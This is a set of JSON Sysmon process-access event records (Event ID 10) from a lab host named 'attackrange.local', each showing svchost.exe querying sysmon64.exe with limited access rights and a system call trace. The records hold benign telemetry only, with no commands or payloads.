{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1474,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1475,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1476,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1477,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1478,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1479,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1480,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1481,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
